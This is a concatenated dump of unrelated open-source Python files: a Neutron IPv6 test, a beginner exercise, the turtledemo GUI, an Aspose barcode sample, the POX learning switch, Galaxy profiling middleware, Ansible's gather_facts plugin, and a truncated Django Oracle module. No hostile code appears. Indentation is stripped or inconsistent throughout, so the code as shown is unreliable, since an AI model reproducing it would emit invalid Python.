mock_open = mock.patch("six.moves.builtins.open").start()
self.mock_read = mock_open.return_value.__enter__.return_value.read
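# Judging by the assertions below, the value read is a disable flag:
# "0" means IPv6 is enabled and "1" means it is disabled.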
def test_enabled(self):
self.mock_read.return_value = "0"
enabled = ipv6_utils.is_enabled()
self.assertTrue(enabled)
def test_disabled(self):
self.mock_read.return_value = "1"
enabled = ipv6_utils.is_enabled()
self.assertFalse(enabled)
def test_disabled_non_exists(self):
self.mock_exists.return_value = False
enabled = ipv6_utils.is_enabled()
self.assertFalse(enabled)
self.assertFalse(self.mock_read.called)
def test_memoize(self):
self.mock_read.return_value = "0"
ipv6_utils.is_enabled()
enabled = ipv6_utils.is_enabled()
self.assertTrue(enabled)
self.mock_read.assert_called_once_with()
class TestIsAutoAddressSubnet(base.BaseTestCase):
def setUp(self):
self.subnet = {
'cidr': '2001:200::/64',
'gateway_ip': '2001:200::1',
'ip_version': 6,
'ipv6_address_mode': None,
'ipv6_ra_mode': None
}
super(TestIsAutoAddressSubnet, self).setUp()
def test_combinations(self):
Mode = collections.namedtuple('Mode', "addr_mode ra_mode "
"is_auto_address")
subnets = [
Mode(None, None, False),
Mode(constants.DHCPV6_STATEFUL, None, False),
Mode(constants.DHCPV6_STATELESS, None, True),
Mode(constants.IPV6_SLAAC, None, True),
Mode(None, constants.DHCPV6_STATEFUL, False),
Mode(None, constants.DHCPV6_STATELESS, True),
Mode(None, constants.IPV6_SLAAC, True),
Mode(constants.DHCPV6_STATEFUL, constants.DHCPV6_STATEFUL, False),
Mode(constants.DHCPV6_STATELESS, constants.DHCPV6_STATELESS, True),
Mode(constants.IPV6_SLAAC, constants.IPV6_SLAAC, True),
]
for subnet in subnets:
self.subnet['ipv6_address_mode'] = subnet.addr_mode
self.subnet['ipv6_ra_mode'] = subnet.ra_mode
self.assertEqual(subnet.is_auto_address,
ipv6_utils.is_auto_address_subnet(self.subnet))
class TestIsEui64Address(base.BaseTestCase):
def _test_eui_64(self, ips, expected):
for ip in ips:
self.assertEqual(expected, ipv6_utils.is_eui64_address(ip),
"Error on %s" % ip)
def test_valid_eui64_addresses(self):
ips = ('fffe::0cad:12ff:fe44:5566',
ipv6_utils.get_ipv6_addr_by_EUI64('2001:db8::',
'00:16:3e:33:44:55'))
self._test_eui_64(ips, True)
def test_invalid_eui64_addresses(self):
ips = ('192.168.1.1',
'192.168.1.0',
'255.255.255.255',
'0.0.0.0',
'fffe::',
'ff80::1',
'fffe::0cad:12ff:ff44:5566',
'fffe::0cad:12fe:fe44:5566',
'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')
self._test_eui_64(ips, False)
|
apache-2.0
|
Suiname/LearnPython
|
functions.py
|
1
|
1636
|
def my_function():
print "Hello From My Function!"
def my_function_with_args(username, greeting):
print "Hello, %s , From My Function!, I wish you %s"%(username, greeting)
def sum_two_numbers(a, b):
return a + b
# print a simple greeting
my_function()
#prints - "Hello, John Doe, From My Function!, I wish you a great year!"
my_function_with_args("John Doe", "a great year!")
# after this line x will hold the value 3!
x = sum_two_numbers(1,2)
print x
# In this exercise you'll use an existing function and, by adding your own, create a fully functional program.
#
# Add a function named list_benefits() that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
#
# Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
#
# Run and see all the functions work together!
# Modify this function to return a list of strings as defined above
def list_benefits():
return ("More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together")
# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
return (benefit + " is a benefit of functions!")
def name_the_benefits_of_functions():
list_of_benefits = list_benefits()
for benefit in list_of_benefits:
print build_sentence(benefit)
name_the_benefits_of_functions()
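# A small extra sketch (not part of the original exercise): Python also
# supports default argument values, which fit naturally with the functions
# above.
def greet(username, greeting="a great year!"):
    return "Hello, %s, I wish you %s" % (username, greeting)

print greet("John Doe")            # uses the default greeting
print greet("John Doe", "luck!")   # overrides it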
|
mit
|
louietsai/python-for-android
|
python3-alpha/python3-src/Lib/turtledemo/__main__.py
|
55
|
9369
|
#!/usr/bin/env python3
import sys
import os
from tkinter import *
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.textView import view_file # TextViewer
from imp import reload
import turtle
import time
demo_dir = os.path.dirname(os.path.abspath(__file__))
STARTUP = 1
READY = 2
RUNNING = 3
DONE = 4
EVENTDRIVEN = 5
menufont = ("Arial", 12, NORMAL)
btnfont = ("Arial", 12, 'bold')
txtfont = ('Lucida Console', 8, 'normal')
def getExampleEntries():
return [entry[:-3] for entry in os.listdir(demo_dir) if
entry.endswith(".py") and entry[0] != '_']
def showDemoHelp():
view_file(demo.root, "Help on turtleDemo",
os.path.join(demo_dir, "demohelp.txt"))
def showAboutDemo():
view_file(demo.root, "About turtleDemo",
os.path.join(demo_dir, "about_turtledemo.txt"))
def showAboutTurtle():
view_file(demo.root, "About the new turtle module.",
os.path.join(demo_dir, "about_turtle.txt"))
class DemoWindow(object):
def __init__(self, filename=None): #, root=None):
self.root = root = turtle._root = Tk()
root.wm_protocol("WM_DELETE_WINDOW", self._destroy)
#################
self.mBar = Frame(root, relief=RAISED, borderwidth=2)
self.mBar.pack(fill=X)
self.ExamplesBtn = self.makeLoadDemoMenu()
self.OptionsBtn = self.makeHelpMenu()
self.mBar.tk_menuBar(self.ExamplesBtn, self.OptionsBtn) #, QuitBtn)
root.title('Python turtle-graphics examples')
#################
self.left_frame = left_frame = Frame(root)
self.text_frame = text_frame = Frame(left_frame)
        self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.text = text = Text(text_frame,
name='text', padx=5, wrap='none',
width=45)
vbar['command'] = text.yview
vbar.pack(side=LEFT, fill=Y)
#####################
        self.hbar = hbar = Scrollbar(text_frame, name='hbar', orient=HORIZONTAL)
hbar['command'] = text.xview
hbar.pack(side=BOTTOM, fill=X)
#####################
text['yscrollcommand'] = vbar.set
text.config(font=txtfont)
text.config(xscrollcommand=hbar.set)
text.pack(side=LEFT, fill=Y, expand=1)
#####################
        self.output_lbl = Label(left_frame, height=1, text=" --- ", bg="#ddf",
                                font=("Arial", 16, 'normal'))
self.output_lbl.pack(side=BOTTOM, expand=0, fill=X)
#####################
text_frame.pack(side=LEFT, fill=BOTH, expand=0)
left_frame.pack(side=LEFT, fill=BOTH, expand=0)
self.graph_frame = g_frame = Frame(root)
turtle._Screen._root = g_frame
turtle._Screen._canvas = turtle.ScrolledCanvas(g_frame, 800, 600, 1000, 800)
#xturtle.Screen._canvas.pack(expand=1, fill="both")
self.screen = _s_ = turtle.Screen()
#####
turtle.TurtleScreen.__init__(_s_, _s_._canvas)
#####
self.scanvas = _s_._canvas
#xturtle.RawTurtle.canvases = [self.scanvas]
turtle.RawTurtle.screens = [_s_]
self.scanvas.pack(side=TOP, fill=BOTH, expand=1)
self.btn_frame = btn_frame = Frame(g_frame, height=100)
self.start_btn = Button(btn_frame, text=" START ", font=btnfont, fg = "white",
disabledforeground = "#fed", command=self.startDemo)
self.start_btn.pack(side=LEFT, fill=X, expand=1)
self.stop_btn = Button(btn_frame, text=" STOP ", font=btnfont, fg = "white",
disabledforeground = "#fed", command = self.stopIt)
self.stop_btn.pack(side=LEFT, fill=X, expand=1)
self.clear_btn = Button(btn_frame, text=" CLEAR ", font=btnfont, fg = "white",
disabledforeground = "#fed", command = self.clearCanvas)
self.clear_btn.pack(side=LEFT, fill=X, expand=1)
self.btn_frame.pack(side=TOP, fill=BOTH, expand=0)
self.graph_frame.pack(side=TOP, fill=BOTH, expand=1)
Percolator(text).insertfilter(ColorDelegator())
self.dirty = False
self.exitflag = False
if filename:
self.loadfile(filename)
self.configGUI(NORMAL, DISABLED, DISABLED, DISABLED,
"Choose example from menu", "black")
self.state = STARTUP
def _destroy(self):
self.root.destroy()
sys.exit()
def configGUI(self, menu, start, stop, clear, txt="", color="blue"):
self.ExamplesBtn.config(state=menu)
self.start_btn.config(state=start)
if start == NORMAL:
self.start_btn.config(bg="#d00")
else:
self.start_btn.config(bg="#fca")
self.stop_btn.config(state=stop)
if stop == NORMAL:
self.stop_btn.config(bg="#d00")
else:
self.stop_btn.config(bg="#fca")
self.clear_btn.config(state=clear)
if clear == NORMAL:
self.clear_btn.config(bg="#d00")
else:
self.clear_btn.config(bg="#fca")
self.output_lbl.config(text=txt, fg=color)
def makeLoadDemoMenu(self):
CmdBtn = Menubutton(self.mBar, text='Examples', underline=0, font=menufont)
CmdBtn.pack(side=LEFT, padx="2m")
CmdBtn.menu = Menu(CmdBtn)
for entry in getExampleEntries():
def loadexample(x):
def emit():
self.loadfile(x)
return emit
CmdBtn.menu.add_command(label=entry, underline=0,
font=menufont, command=loadexample(entry))
CmdBtn['menu'] = CmdBtn.menu
return CmdBtn
def makeHelpMenu(self):
CmdBtn = Menubutton(self.mBar, text='Help', underline=0, font=menufont)
CmdBtn.pack(side=LEFT, padx='2m')
CmdBtn.menu = Menu(CmdBtn)
CmdBtn.menu.add_command(label='About turtle.py', font=menufont,
command=showAboutTurtle)
CmdBtn.menu.add_command(label='turtleDemo - Help', font=menufont,
command=showDemoHelp)
CmdBtn.menu.add_command(label='About turtleDemo', font=menufont,
command=showAboutDemo)
CmdBtn['menu'] = CmdBtn.menu
return CmdBtn
def refreshCanvas(self):
if not self.dirty: return
self.screen.clear()
#self.screen.mode("standard")
        self.dirty = False
def loadfile(self, filename):
self.refreshCanvas()
modname = 'turtledemo.' + filename
__import__(modname)
self.module = sys.modules[modname]
with open(self.module.__file__, 'r') as f:
chars = f.read()
self.text.delete("1.0", "end")
self.text.insert("1.0", chars)
self.root.title(filename + " - a Python turtle graphics example")
reload(self.module)
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED,
"Press start button", "red")
self.state = READY
def startDemo(self):
self.refreshCanvas()
self.dirty = True
turtle.TurtleScreen._RUNNING = True
self.configGUI(DISABLED, DISABLED, NORMAL, DISABLED,
"demo running...", "black")
self.screen.clear()
self.screen.mode("standard")
self.state = RUNNING
try:
result = self.module.main()
if result == "EVENTLOOP":
self.state = EVENTDRIVEN
else:
self.state = DONE
except turtle.Terminator:
self.state = DONE
result = "stopped!"
if self.state == DONE:
self.configGUI(NORMAL, NORMAL, DISABLED, NORMAL,
result)
elif self.state == EVENTDRIVEN:
self.exitflag = True
self.configGUI(DISABLED, DISABLED, NORMAL, DISABLED,
"use mouse/keys or STOP", "red")
def clearCanvas(self):
self.refreshCanvas()
self.screen._delete("all")
self.scanvas.config(cursor="")
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED)
def stopIt(self):
if self.exitflag:
self.clearCanvas()
self.exitflag = False
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED,
"STOPPED!", "red")
turtle.TurtleScreen._RUNNING = False
#print "stopIT: exitflag = True"
else:
turtle.TurtleScreen._RUNNING = False
#print "stopIt: exitflag = False"
if __name__ == '__main__':
demo = DemoWindow()
RUN = True
while RUN:
try:
#print("ENTERING mainloop")
demo.root.mainloop()
except AttributeError:
#print("AttributeError!- WAIT A MOMENT!")
time.sleep(0.3)
print("GOING ON ..")
            demo.clearCanvas()
except TypeError:
demo.screen._delete("all")
#print("CRASH!!!- WAIT A MOMENT!")
time.sleep(0.3)
#print("GOING ON ..")
demo.clearCanvas()
except:
print("BYE!")
RUN = False
|
apache-2.0
|
ali-salman/Aspose_Words_Java
|
Plugins/Aspose_Words_Java_for_Jython/asposewords/programming_documents/InsertBarcode.py
|
4
|
2722
|
from asposewords import Settings
from com.aspose.words import Document
from com.aspose.words import DocumentBuilder
from com.aspose.words import HeaderFooterType
from com.aspose.words import ControlChar
from com.aspose.words import SectionStart
from com.aspose.words import TabAlignment
from com.aspose.words import TabLeader
from com.aspose.words import TabStop
from java.io import File
from javax.imageio import ImageIO
class InsertBarcodeOnEachPage:
def __init__(self):
self.dataDir = Settings.dataDir + 'programming_documents/'
# Create a blank document.
doc = Document()
builder = DocumentBuilder(doc)
# The number of pages the document should have.
numPages = 4
# The document starts with one section, insert the barcode into this existing section.
self.insert_barcode_into_footer(builder, doc.getFirstSection(), 1, HeaderFooterType.FOOTER_PRIMARY)
i = 1
        while i < numPages:
# Clone the first section and add it into the end of the document.
cloneSection = doc.getFirstSection().deepClone(False)
cloneSection.getPageSetup().setSectionStart(SectionStart.NEW_PAGE)
doc.appendChild(cloneSection)
# Insert the barcode and other information into the footer of the section.
self.insert_barcode_into_footer(builder, cloneSection, i, HeaderFooterType.FOOTER_PRIMARY)
i = i + 1
        # Save the document to disk. You can also save it directly to a stream.
doc.save(self.dataDir + "InsertBarcodeOnEachPage.docx")
print "Aspose Barcode Inserted..."
def insert_barcode_into_footer(self, builder, section, pageId, footerType):
# Move to the footer type in the specific section.
builder.moveToSection(section.getDocument().indexOf(section))
builder.moveToHeaderFooter(footerType)
# Insert the barcode, then move to the next line and insert the ID
# along with the page number.
# Use pageId if you need to insert a different barcode on each page. 0
# = First page, 1 = Second page etc.
builder.insertImage(ImageIO.read(File(self.dataDir + "barcode.png")))
builder.writeln()
builder.write("1234567890")
builder.insertField("PAGE")
# Create a right aligned tab at the right margin.
tabPos = section.getPageSetup().getPageWidth() - section.getPageSetup().getRightMargin() - section.getPageSetup().getLeftMargin()
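        # Illustrative numbers: on a default Letter page (612pt wide with
        # 72pt margins) tabPos evaluates to 468pt, i.e. the usable text width.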
builder.getCurrentParagraph().getParagraphFormat().getTabStops().add(TabStop(tabPos, TabAlignment.RIGHT, TabLeader.NONE))
# Move to the right hand side of the page and insert the page and page total.
builder.write(ControlChar.TAB)
builder.insertField("PAGE")
builder.write(" of ")
builder.insertField("NUMPAGES")
if __name__ == '__main__':
InsertBarcodeOnEachPage()
|
mit
|
timhuanggithub/pox_load_balancing
|
pox/forwarding/l2_learning.py
|
25
|
6779
|
# Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
An L2 learning switch.
It is derived from one written live for an SDN crash course.
It is somewhat similar to NOX's pyswitch in that it installs
exact-match rules for each flow.
"""
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
import time
log = core.getLogger()
# We don't want to flood immediately when a switch connects.
# Can be overridden on the command line.
_flood_delay = 0
class LearningSwitch (object):
"""
The learning switch "brain" associated with a single OpenFlow switch.
When we see a packet, we'd like to output it on a port which will
eventually lead to the destination. To accomplish this, we build a
table that maps addresses to ports.
We populate the table by observing traffic. When we see a packet
from some source coming from some port, we know that source is out
that port.
  When we want to forward traffic, we look up the destination in our
table. If we don't know the port, we simply send the message out
all ports except the one it came in on. (In the presence of loops,
this is bad!).
In short, our algorithm looks like this:
For each packet from the switch:
1) Use source address and switch port to update address/port table
2) Is transparent = False and either Ethertype is LLDP or the packet's
destination address is a Bridge Filtered address?
Yes:
2a) Drop packet -- don't forward link-local traffic (LLDP, 802.1x)
DONE
3) Is destination multicast?
Yes:
3a) Flood the packet
DONE
4) Port for destination address in our address/port table?
No:
4a) Flood the packet
DONE
5) Is output port the same as input port?
Yes:
5a) Drop packet and similar ones for a while
6) Install flow table entry in the switch so that this
     flow goes out the appropriate port
6a) Send the packet out appropriate port
"""
def __init__ (self, connection, transparent):
# Switch we'll be adding L2 learning switch capabilities to
self.connection = connection
self.transparent = transparent
# Our table
self.macToPort = {}
# We want to hear PacketIn messages, so we listen
# to the connection
connection.addListeners(self)
# We just use this to know when to log a helpful message
self.hold_down_expired = _flood_delay == 0
#log.debug("Initializing LearningSwitch, transparent=%s",
# str(self.transparent))
def _handle_PacketIn (self, event):
"""
Handle packet in messages from the switch to implement above algorithm.
"""
packet = event.parsed
def flood (message = None):
""" Floods the packet """
msg = of.ofp_packet_out()
if time.time() - self.connection.connect_time >= _flood_delay:
# Only flood if we've been connected for a little while...
if self.hold_down_expired is False:
# Oh yes it is!
self.hold_down_expired = True
log.info("%s: Flood hold-down expired -- flooding",
dpid_to_str(event.dpid))
if message is not None: log.debug(message)
#log.debug("%i: flood %s -> %s", event.dpid,packet.src,packet.dst)
# OFPP_FLOOD is optional; on some switches you may need to change
# this to OFPP_ALL.
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
else:
pass
#log.info("Holding down flood for %s", dpid_to_str(event.dpid))
msg.data = event.ofp
msg.in_port = event.port
self.connection.send(msg)
def drop (duration = None):
"""
Drops this packet and optionally installs a flow to continue
dropping similar ones for a while
"""
if duration is not None:
if not isinstance(duration, tuple):
duration = (duration,duration)
msg = of.ofp_flow_mod()
msg.match = of.ofp_match.from_packet(packet)
msg.idle_timeout = duration[0]
msg.hard_timeout = duration[1]
msg.buffer_id = event.ofp.buffer_id
self.connection.send(msg)
elif event.ofp.buffer_id is not None:
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
self.connection.send(msg)
self.macToPort[packet.src] = event.port # 1
if not self.transparent: # 2
if packet.type == packet.LLDP_TYPE or packet.dst.isBridgeFiltered():
drop() # 2a
return
if packet.dst.is_multicast:
flood() # 3a
else:
if packet.dst not in self.macToPort: # 4
flood("Port for %s unknown -- flooding" % (packet.dst,)) # 4a
else:
port = self.macToPort[packet.dst]
if port == event.port: # 5
# 5a
log.warning("Same port for packet from %s -> %s on %s.%s. Drop."
% (packet.src, packet.dst, dpid_to_str(event.dpid), port))
drop(10)
return
# 6
log.debug("installing flow for %s.%i -> %s.%i" %
(packet.src, event.port, packet.dst, port))
msg = of.ofp_flow_mod()
msg.match = of.ofp_match.from_packet(packet, event.port)
msg.idle_timeout = 10
msg.hard_timeout = 30
msg.actions.append(of.ofp_action_output(port = port))
msg.data = event.ofp # 6a
self.connection.send(msg)
class l2_learning (object):
"""
Waits for OpenFlow switches to connect and makes them learning switches.
"""
def __init__ (self, transparent):
core.openflow.addListeners(self)
self.transparent = transparent
def _handle_ConnectionUp (self, event):
log.debug("Connection %s" % (event.connection,))
LearningSwitch(event.connection, self.transparent)
def launch (transparent=False, hold_down=_flood_delay):
"""
Starts an L2 learning switch.
"""
try:
global _flood_delay
_flood_delay = int(str(hold_down), 10)
assert _flood_delay >= 0
except:
raise RuntimeError("Expected hold-down to be a number")
core.registerNew(l2_learning, str_to_bool(transparent))
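# Usage sketch (assuming the standard POX launcher; not part of this file):
#
#   ./pox.py forwarding.l2_learning
#   ./pox.py forwarding.l2_learning --transparent=True --hold_down=5
#
# The launcher calls launch() above with the given keyword arguments.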
|
gpl-3.0
|
volpino/Yeps-EURAC
|
lib/galaxy/web/framework/middleware/profile.py
|
2
|
6006
|
"""
Middleware that profiles the request with cProfile and displays profiling
information at the bottom of each page.
"""
import sys
import os
import threading
import cgi
import time
from cStringIO import StringIO
from paste import response
try:
# Included in Python 2.5
import cProfile
except:
try:
# Included in lsprof package for Python 2.4
import pkg_resources
pkg_resources.require( "lsprof" )
import cProfile
except:
cProfile = None
import pstats
template = """
<script>
function show_profile_output()
{
var win = window.open("", "win"); // a window object
var doc = win.document;
doc.open("text/html", "replace");
doc.write("<HTML><HEAD><TITLE>Profiler output</TITLE></HEAD><BODY>")
doc.write(document.getElementById( 'profile_output' ).innerHTML)
doc.write("</BODY></HTML>");
doc.close();
}
function show_inline()
{
document.getElementById( 'profile_output' ).style.display="block";
}
</script>
<div style="background-color: #ff9; color: #000; border: 2px solid #000; padding: 5px;">
show profile output: <a href="javascript:show_inline();">inline</a> | <a href="javascript:show_profile_output();">new window</a>
<div id="profile_output" style="display: none">
<hr />
%s
</div>
</div>
"""
class ProfileMiddleware(object):
"""
Middleware that profiles all requests.
All HTML pages will have profiling information appended to them.
The data is isolated to that single request, and does not include
data from previous requests.
"""
def __init__( self, app, global_conf=None, limit=40 ):
self.app = app
self.lock = threading.Lock()
self.limit = limit
def __call__(self, environ, start_response):
catch_response = []
body = []
def replace_start_response(status, headers, exc_info=None):
catch_response.extend([status, headers])
start_response(status, headers, exc_info)
return body.append
def run_app():
body.extend(self.app(environ, replace_start_response))
# Run in profiler
prof = cProfile.Profile()
prof.runctx( "run_app()", globals(), locals() )
# Build up body with stats
body = ''.join(body)
headers = catch_response[1]
content_type = response.header_value(headers, 'content-type')
if not content_type.startswith('text/html'):
# We can't add info to non-HTML output
return [body]
stats = pstats.Stats( prof )
stats.strip_dirs()
stats.sort_stats( 'time', 'calls' )
output = pstats_as_html( stats, self.limit )
body += template % output
return [body]
def pstats_as_html( stats, *sel_list ):
"""
Return an HTML representation of a pstats.Stats object.
"""
rval = []
# Number of function calls, primitive calls, total time
rval.append( "<div>%d function calls (%d primitive) in %0.3f CPU seconds</div>"
% ( stats.total_calls, stats.prim_calls, stats.total_tt ) )
# Extract functions that match 'sel_list'
funcs, order_message, select_message = get_func_list( stats, sel_list )
# Deal with any ordering or selection messages
if order_message:
rval.append( "<div>%s</div>" % cgi.escape( order_message ) )
if select_message:
rval.append( "<div>%s</div>" % cgi.escape( select_message ) )
# Build a table for the functions
    if funcs:
rval.append( "<table>" )
# Header
rval.append( "<tr><th>ncalls</th>"
"<th>tottime</th>"
"<th>percall</th>"
"<th>cumtime</th>"
"<th>percall</th>"
"<th>filename:lineno(function)</th></tr>" )
for func in funcs:
rval.append( "<tr>" )
# Calculate each field
cc, nc, tt, ct, callers = stats.stats[ func ]
# ncalls
ncalls = str(nc)
if nc != cc:
ncalls = ncalls + '/' + str(cc)
rval.append( "<td>%s</td>" % cgi.escape( ncalls ) )
# tottime
rval.append( "<td>%0.8f</td>" % tt )
# percall
if nc == 0:
percall = ""
else:
percall = "%0.8f" % ( tt / nc )
rval.append( "<td>%s</td>" % cgi.escape( percall ) )
# cumtime
rval.append( "<td>%0.8f</td>" % ct )
# ctpercall
if cc == 0:
ctpercall = ""
else:
ctpercall = "%0.8f" % ( ct / cc )
rval.append( "<td>%s</td>" % cgi.escape( ctpercall ) )
# location
rval.append( "<td>%s</td>" % cgi.escape( func_std_string( func ) ) )
# row complete
rval.append( "</tr>" )
rval.append( "</table>")
# Concatenate result
return "".join( rval )
def get_func_list( stats, sel_list ):
"""
Use 'sel_list' to select a list of functions to display.
"""
# Determine if an ordering was applied
if stats.fcn_list:
list = stats.fcn_list[:]
order_message = "Ordered by: " + stats.sort_type
else:
list = stats.stats.keys()
order_message = "Random listing order was used"
# Do the selection and accumulate messages
select_message = ""
for selection in sel_list:
list, select_message = stats.eval_print_amount( selection, list, select_message )
# Return the list of functions selected and the message
return list, order_message, select_message
def func_std_string( func_name ):
"""
Match what old profile produced
"""
if func_name[:2] == ('~', 0):
# special case for built-in functions
name = func_name[2]
if name.startswith('<') and name.endswith('>'):
return '{%s}' % name[1:-1]
else:
return name
else:
return "%s:%d(%s)" % func_name
|
mit
|
ganeshrn/ansible
|
lib/ansible/plugins/action/gather_facts.py
|
11
|
6368
|
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import time
from ansible import constants as C
from ansible.executor.module_common import get_action_args_with_defaults
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.plugins.action import ActionBase
from ansible.utils.vars import merge_hash
class ActionModule(ActionBase):
def _get_module_args(self, fact_module, task_vars):
mod_args = self._task.args.copy()
# deal with 'setup specific arguments'
if fact_module not in C._ACTION_SETUP:
# network facts modules must support gather_subset
if self._connection._load_name not in ('network_cli', 'httpapi', 'netconf'):
subset = mod_args.pop('gather_subset', None)
if subset not in ('all', ['all']):
self._display.warning('Ignoring subset(%s) for %s' % (subset, fact_module))
timeout = mod_args.pop('gather_timeout', None)
if timeout is not None:
self._display.warning('Ignoring timeout(%s) for %s' % (timeout, fact_module))
fact_filter = mod_args.pop('filter', None)
if fact_filter is not None:
self._display.warning('Ignoring filter(%s) for %s' % (fact_filter, fact_module))
# Strip out keys with ``None`` values, effectively mimicking ``omit`` behavior
# This ensures we don't pass a ``None`` value as an argument expecting a specific type
mod_args = dict((k, v) for k, v in mod_args.items() if v is not None)
# handle module defaults
redirect_list = self._shared_loader_obj.module_loader.find_plugin_with_context(
fact_module, collection_list=self._task.collections
).redirect_list
mod_args = get_action_args_with_defaults(
fact_module, mod_args, self._task.module_defaults, self._templar, redirect_list
)
return mod_args
def _combine_task_result(self, result, task_result):
filtered_res = {
'ansible_facts': task_result.get('ansible_facts', {}),
'warnings': task_result.get('warnings', []),
'deprecations': task_result.get('deprecations', []),
}
# on conflict the last plugin processed wins, but try to do deep merge and append to lists.
return merge_hash(result, filtered_res, list_merge='append_rp')
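    # Illustrative merge semantics (values are made up): combining a result
    # that already holds {'warnings': ['b']} with {'warnings': ['a']} under
    # list_merge='append_rp' yields {'warnings': ['b', 'a']}, while
    # conflicting 'ansible_facts' keys take the later module's value.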
def run(self, tmp=None, task_vars=None):
self._supports_check_mode = True
result = super(ActionModule, self).run(tmp, task_vars)
result['ansible_facts'] = {}
# copy the value with list() so we don't mutate the config
modules = list(C.config.get_config_value('FACTS_MODULES', variables=task_vars))
parallel = task_vars.pop('ansible_facts_parallel', self._task.args.pop('parallel', None))
if 'smart' in modules:
connection_map = C.config.get_config_value('CONNECTION_FACTS_MODULES', variables=task_vars)
network_os = self._task.args.get('network_os', task_vars.get('ansible_network_os', task_vars.get('ansible_facts', {}).get('network_os')))
modules.extend([connection_map.get(network_os or self._connection._load_name, 'ansible.legacy.setup')])
modules.pop(modules.index('smart'))
failed = {}
skipped = {}
        if parallel is None:
            # default to parallel only when more than one module has to run
            parallel = len(modules) > 1
        else:
            parallel = boolean(parallel)
        if not parallel:
            # serially execute each module
for fact_module in modules:
# just one module, no need for fancy async
mod_args = self._get_module_args(fact_module, task_vars)
res = self._execute_module(module_name=fact_module, module_args=mod_args, task_vars=task_vars, wrap_async=False)
if res.get('failed', False):
failed[fact_module] = res
elif res.get('skipped', False):
skipped[fact_module] = res
else:
result = self._combine_task_result(result, res)
self._remove_tmp_path(self._connection._shell.tmpdir)
else:
# do it async
jobs = {}
for fact_module in modules:
mod_args = self._get_module_args(fact_module, task_vars)
self._display.vvvv("Running %s" % fact_module)
jobs[fact_module] = (self._execute_module(module_name=fact_module, module_args=mod_args, task_vars=task_vars, wrap_async=True))
while jobs:
for module in jobs:
poll_args = {'jid': jobs[module]['ansible_job_id'], '_async_dir': os.path.dirname(jobs[module]['results_file'])}
res = self._execute_module(module_name='ansible.legacy.async_status', module_args=poll_args, task_vars=task_vars, wrap_async=False)
if res.get('finished', 0) == 1:
if res.get('failed', False):
failed[module] = res
elif res.get('skipped', False):
skipped[module] = res
else:
result = self._combine_task_result(result, res)
del jobs[module]
break
else:
time.sleep(0.1)
else:
time.sleep(0.5)
if skipped:
result['msg'] = "The following modules were skipped: %s\n" % (', '.join(skipped.keys()))
result['skipped_modules'] = skipped
if len(skipped) == len(modules):
result['skipped'] = True
if failed:
result['failed'] = True
result['msg'] = "The following modules failed to execute: %s\n" % (', '.join(failed.keys()))
result['failed_modules'] = failed
# tell executor facts were gathered
result['ansible_facts']['_ansible_facts_gathered'] = True
# hack to keep --verbose from showing all the setup module result
result['_ansible_verbose_override'] = True
return result
|
gpl-3.0
|
scottferg/web-console
|
django/db/backends/oracle/creation.py
|
9
|
11427
|
import sys, time
from django.db.backends.creation import BaseDatabaseCreation
TEST_DATABASE_PREFIX = 'test_'
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
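    # For example, a CharField with max_length=50 renders as NVARCHAR2(50);
    # %(qn_column)s placeholders are filled with the quoted column name
    # before the DDL is emitted (an illustration of the mapping above).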
def __init__(self, connection):
self.remember = {}
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
